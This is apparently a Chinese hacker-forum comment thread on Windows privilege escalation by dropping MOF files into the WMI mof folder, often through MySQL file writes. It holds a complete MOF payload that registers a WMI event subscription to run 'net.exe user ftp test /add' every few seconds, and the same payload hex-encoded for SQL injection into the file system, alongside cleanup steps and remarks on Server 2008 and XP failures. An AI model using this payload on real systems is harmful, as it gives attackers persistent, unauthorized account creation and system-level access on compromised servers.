我想到了提权

楼主好淫荡。

好吧~看到1#~我想到了提权~

貌似最近的mysql漏洞就是用来第三种。。。

还是剑老大犀利，已经发了
就像文中说的，2003下提权好用，2008后续版本不再支持第三种方法，然后就不行了。

@xsser 我现在只想知道怎么停止已执行的mof，昨天测试的时候放了个.mof到C:\WINDOWS\system32\wbem\mof\ 从昨天晚上一直到现在还在每过5秒就执行次 加个用户，搞的我郁闷死了。。。

昨天听 B1n4ry 说把net stop winmgmt 服务停止后，然后在删除了加进去的.mof OK 没继续执行了，，但是我怕服务器出现问题又把winmgmt 服务启动了， 邪恶 又开始5秒后自动加用户！

咋办。。

@xsser 可写要变执行挺简单的，各种自启动，各种写hive

@鬼哥 这文件删除了成么？

@xsser 不成，，刚baidu了下 找到了方法停止。。

@鬼哥 那你也回复下啊

@鬼哥 删除C:\WINDOWS\system32\wbem\mof\good 添加的mof后，在启动winmgmt 没出现加账户啊！
C:\Documents and Settings\Administrator>net stop winmgmt
Windows Management Instrumentation 服务正在停止.
Windows Management Instrumentation 服务已成功停止。
C:\Documents and Settings\Administrator>net start winmgmt
Windows Management Instrumentation 服务正在启动 .
Windows Management Instrumentation 服务已经启动成功。

@whking 你这个方法不行， 删除C:\WINDOWS\system32\wbem\mof\good 添加的mof后 启动服务后还是会继续加用户 不相信可以叫各位集友试下。。

@xsser 我错了，，，正确的方式是：
第一 net stop winmgmt 停止服务，
第二 删除文件夹：C:\WINDOWS\system32\wbem\Repository\
第三 net start winmgmt 启动服务

第四：完毕不会在执行了。C:\WINDOWS\system32\wbem\Repository\ 放的是储存库　我们执行的.mof都会被加入到这个库了。然后一直按脚本设置的时间执行。。　删除后　重新启动　会重建个默认储存库　这样我们先前执行mof就没了。

有一个提权的思路

感谢群里的vka0n0

#pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter {EventNamespace = "Root\\Cimv2";Name = "filtP2";Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL";}; instance of ActiveScriptEventConsumer as $Consumer {Name = "consPCSV2";ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user ftp test /add\")";}; instance of __FilterToConsumerBinding {Consumer = $Consumer;Filter = $EventFilter;};

感谢暴暴，

0x23707261676D61206E616D65737061636528225C5C5C5C2E5C5C726F6F745C5C737562736372697074696F6E22290D0A696E7374616E6365206F66205F5F4576656E7446696C74657220617320244576656E7446696C7465720D0A7B4576656E744E616D657370616365203D2022526F6F745C5C43696D7632223B4E616D6520203D202266696C745032223B5175657279203D202253656C656374202A2046726F6D205F5F496E7374616E63654D6F64696669636174696F6E4576656E742022200D0A22576865726520546172676574496E7374616E636520497361205C2257696E33325F4C6F63616C54696D655C2220220D0A22416E6420546172676574496E7374616E63652E5365636F6E64203D2035223B0D0A51756572794C616E6775616765203D202257514C223B7D3B0D0A696E7374616E6365206F66204163746976655363726970744576656E74436F6E73756D65722061732024436F6E73756D65720D0A7B4E616D65203D2022636F6E735043535632223B536372697074696E67456E67696E65203D20224A536372697074223B0D0A53637269707454657874203D202276617220575348203D206E657720416374697665584F626A656374285C22575363726970742E5368656C6C5C22295C6E5753482E72756E285C226E65742E6578652075736572206674702074657374202F6164645C2229223B7D3B0D0A696E7374616E6365206F66205F5F46696C746572546F436F6E73756D657242696E64696E670D0A7B436F6E73756D65722020203D2024436F6E73756D65723B46696C746572203D20244576656E7446696C7465723B7D3B

差异备份是成功不了的。。o(╯□╰)o
@xsser

防范办法把Wbem\MOF文件夹设成只读就可以么？

@cnrstar 嗯 得把前面的乱码处理掉

@xsser 请问如何去掉乱码。。

@sec123 嗯 去掉不了 这图是转的群里的

最重要的还是自动执行啊。这个很难过。

这个图片不是把FTP 这个用户删除了吗 ？ 怎么还会有FTP 这个用户呢？

@lion(lp) 应该是把ftp这个用户删除后，又跑了一遍sql。方便演示吧。
我失败了，各种求解释。

好吧，我测试也是失败的。。。。。o(╯□╰)o

我也是各种失败的。。。不知道为啥了  @hongygxiang

@鬼哥 坐等大牛前来指导

2008的机器直接导出到目录下面,怎么让这个执行呢?

@jk_影 2008不是就不可以了吗？我在xp上就不行，可以dumpfile到C:\WINDOWS\system32这个目录里，不能dump到webem及其以下目录，而且说是2008不再支持拖动直接运行这种形式。

make下下次碰到能用